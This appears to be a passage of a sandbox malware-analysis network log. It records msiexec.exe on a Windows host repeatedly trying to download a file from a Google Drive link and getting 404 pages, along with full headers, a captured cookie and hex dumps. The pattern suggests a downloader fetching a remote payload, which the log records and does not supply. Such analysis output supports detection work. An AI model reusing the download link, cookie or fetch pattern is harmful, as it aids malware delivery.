                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                              Content-Security-Policy: script-src 'nonce-5Ak-aDRE4q5gSHY7kuvoGg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                              Cross-Origin-Opener-Policy: same-origin
                                                              Content-Length: 1652
                                                              Server: UploadServer
                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                              Content-Security-Policy: sandbox allow-scripts
                                                              Connection: close
                                                              2025-01-10 23:02:55 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 2d 71 59 38 35 38 6c 6c 54 58 76 63 58 5f 77 58 38 6c 55 64 6d 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="-qY858llTXvcX_wX8lUdmw">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              56192.168.2.849765216.58.206.464432160C:\Windows\SysWOW64\msiexec.exe
                                                              TimestampBytes transferredDirectionData
                                                              2025-01-10 23:02:55 UTC418OUTGET /uc?export=download&id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP HTTP/1.1
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                              Host: drive.google.com
                                                              Cache-Control: no-cache
                                                              Cookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
                                                              2025-01-10 23:02:56 UTC1920INHTTP/1.1 303 See Other
                                                              Content-Type: application/binary
                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                              Pragma: no-cache
                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                              Date: Fri, 10 Jan 2025 23:02:56 GMT
                                                              Location: https://drive.usercontent.google.com/download?id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP&export=download
                                                              Strict-Transport-Security: max-age=31536000
                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                              Content-Security-Policy: script-src 'nonce-54k1n2SEbghZzJhUXujQfQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                              Cross-Origin-Opener-Policy: same-origin
                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                              Server: ESF
                                                              Content-Length: 0
                                                              X-XSS-Protection: 0
                                                              X-Frame-Options: SAMEORIGIN
                                                              X-Content-Type-Options: nosniff
                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                              Connection: close


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              57192.168.2.849766172.217.16.1934432160C:\Windows\SysWOW64\msiexec.exe
                                                              TimestampBytes transferredDirectionData
                                                              2025-01-10 23:02:56 UTC460OUTGET /download?id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP&export=download HTTP/1.1
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                              Cache-Control: no-cache
                                                              Host: drive.usercontent.google.com
                                                              Connection: Keep-Alive
                                                              Cookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
                                                              2025-01-10 23:02:57 UTC1851INHTTP/1.1 404 Not Found
                                                              X-GUploader-UploadID: AFIdbgS56XdYJC_Cscee8oTNI8OTyX5KIniKl1XzvA8D2ya4JmpD9rbifUt4mw3XTVh1BJCeqtBX6rk
                                                              Content-Type: text/html; charset=utf-8
                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                              Pragma: no-cache
                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                              Date: Fri, 10 Jan 2025 23:02:57 GMT
                                                              Cross-Origin-Opener-Policy: same-origin
                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                              Content-Security-Policy: script-src 'nonce-amwoCEfAgwyciBlWv_V4qg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                              Content-Length: 1652
                                                              Server: UploadServer
                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                              Content-Security-Policy: sandbox allow-scripts
                                                              Connection: close
                                                              2025-01-10 23:02:57 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 58 70 52 38 67 36 39 66 79 34 39 77 45 77 37 63 73 5a 48 35 30 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="XpR8g69fy49wEw7csZH50Q">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              58192.168.2.849767216.58.206.464432160C:\Windows\SysWOW64\msiexec.exe
                                                              TimestampBytes transferredDirectionData
                                                              2025-01-10 23:02:58 UTC418OUTGET /uc?export=download&id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP HTTP/1.1
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                              Host: drive.google.com
                                                              Cache-Control: no-cache
                                                              Cookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
                                                              2025-01-10 23:02:58 UTC1920INHTTP/1.1 303 See Other
                                                              Content-Type: application/binary
                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                              Pragma: no-cache
                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                              Date: Fri, 10 Jan 2025 23:02:58 GMT
                                                              Location: https://drive.usercontent.google.com/download?id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP&export=download
                                                              Strict-Transport-Security: max-age=31536000
                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                              Content-Security-Policy: script-src 'nonce-W4HgkpebGOxoOIQ77Qvofw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                              Cross-Origin-Opener-Policy: same-origin
                                                              Server: ESF
                                                              Content-Length: 0
                                                              X-XSS-Protection: 0
                                                              X-Frame-Options: SAMEORIGIN
                                                              X-Content-Type-Options: nosniff
                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                              Connection: close


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              59192.168.2.849768172.217.16.1934432160C:\Windows\SysWOW64\msiexec.exe
                                                              TimestampBytes transferredDirectionData
                                                              2025-01-10 23:02:59 UTC460OUTGET /download?id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP&export=download HTTP/1.1
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                              Cache-Control: no-cache
                                                              Host: drive.usercontent.google.com
                                                              Connection: Keep-Alive
                                                              Cookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
                                                              2025-01-10 23:02:59 UTC1844INHTTP/1.1 404 Not Found
                                                              X-GUploader-UploadID: AFIdbgR4aHqqIKt2xM_Ete05aufdESMF_kJyeDUlbD8RyOKwy8pi0pJdFaz04teLSHCFcqow
                                                              Content-Type: text/html; charset=utf-8
                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                              Pragma: no-cache
                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                              Date: Fri, 10 Jan 2025 23:02:59 GMT
                                                              Cross-Origin-Opener-Policy: same-origin
                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                              Content-Security-Policy: script-src 'nonce-FCnZDBoxrNP2ohNT_-FG1Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                              Content-Length: 1652
                                                              Server: UploadServer
                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                              Content-Security-Policy: sandbox allow-scripts
                                                              Connection: close
                                                              2025-01-10 23:02:59 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 6f 68 50 34 34 50 42 37 34 2d 63 68 52 6f 50 57 46 36 53 72 4c 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="ohP44PB74-chRoPWF6SrLg">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              60192.168.2.849769216.58.206.464432160C:\Windows\SysWOW64\msiexec.exe
                                                              TimestampBytes transferredDirectionData
                                                              2025-01-10 23:03:00 UTC418OUTGET /uc?export=download&id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP HTTP/1.1
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                              Host: drive.google.com
                                                              Cache-Control: no-cache
                                                              Cookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
                                                              2025-01-10 23:03:00 UTC1920INHTTP/1.1 303 See Other
                                                              Content-Type: application/binary
                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                              Pragma: no-cache
                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                              Date: Fri, 10 Jan 2025 23:03:00 GMT
                                                              Location: https://drive.usercontent.google.com/download?id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP&export=download
                                                              Strict-Transport-Security: max-age=31536000
                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                              Content-Security-Policy: script-src 'nonce-9KLcRr7E4e3NCiJyyn-CWg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                              Cross-Origin-Opener-Policy: same-origin
                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                              Server: ESF
                                                              Content-Length: 0
                                                              X-XSS-Protection: 0
                                                              X-Frame-Options: SAMEORIGIN
                                                              X-Content-Type-Options: nosniff
                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                              Connection: close


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              61192.168.2.849770172.217.16.1934432160C:\Windows\SysWOW64\msiexec.exe
                                                              TimestampBytes transferredDirectionData
                                                              2025-01-10 23:03:01 UTC460OUTGET /download?id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP&export=download HTTP/1.1
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                              Cache-Control: no-cache
                                                              Host: drive.usercontent.google.com
                                                              Connection: Keep-Alive
                                                              Cookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
                                                              2025-01-10 23:03:01 UTC1851INHTTP/1.1 404 Not Found
                                                              X-GUploader-UploadID: AFiumC5JaV-GwXVGnir7kPp2M9m76bYcVNzOfII5YMZo3e0aWgw3Jcm2TfaJOcjHF6HP0pXQCZiaZcE
                                                              Content-Type: text/html; charset=utf-8
                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                              Pragma: no-cache
                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                              Date: Fri, 10 Jan 2025 23:03:01 GMT
                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                              Content-Security-Policy: script-src 'nonce-6uQy5xcDImAJFpKa5sUbVg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                              Cross-Origin-Opener-Policy: same-origin
                                                              Content-Length: 1652
                                                              Server: UploadServer
                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                              Content-Security-Policy: sandbox allow-scripts
                                                              Connection: close
                                                              2025-01-10 23:03:01 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 77 76 61 4b 43 37 48 30 30 68 45 4c 2d 61 64 2d 4e 4c 75 32 75 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="wvaKC7H00hEL-ad-NLu2uw">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              62192.168.2.849771216.58.206.464432160C:\Windows\SysWOW64\msiexec.exe
                                                              TimestampBytes transferredDirectionData
                                                              2025-01-10 23:03:02 UTC418OUTGET /uc?export=download&id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP HTTP/1.1
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                              Host: drive.google.com
                                                              Cache-Control: no-cache
                                                              Cookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
                                                              2025-01-10 23:03:02 UTC1920INHTTP/1.1 303 See Other
                                                              Content-Type: application/binary
                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                              Pragma: no-cache
                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                              Date: Fri, 10 Jan 2025 23:03:02 GMT
                                                              Location: https://drive.usercontent.google.com/download?id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP&export=download
                                                              Strict-Transport-Security: max-age=31536000
                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                              Cross-Origin-Opener-Policy: same-origin
                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                              Content-Security-Policy: script-src 'nonce-GoYl2x-WdYI46xxrAw6Iqw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                              Server: ESF
                                                              Content-Length: 0
                                                              X-XSS-Protection: 0
                                                              X-Frame-Options: SAMEORIGIN
                                                              X-Content-Type-Options: nosniff
                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                              Connection: close


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              63192.168.2.849772172.217.16.1934432160C:\Windows\SysWOW64\msiexec.exe
                                                              TimestampBytes transferredDirectionData
                                                              2025-01-10 23:03:03 UTC460OUTGET /download?id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP&export=download HTTP/1.1
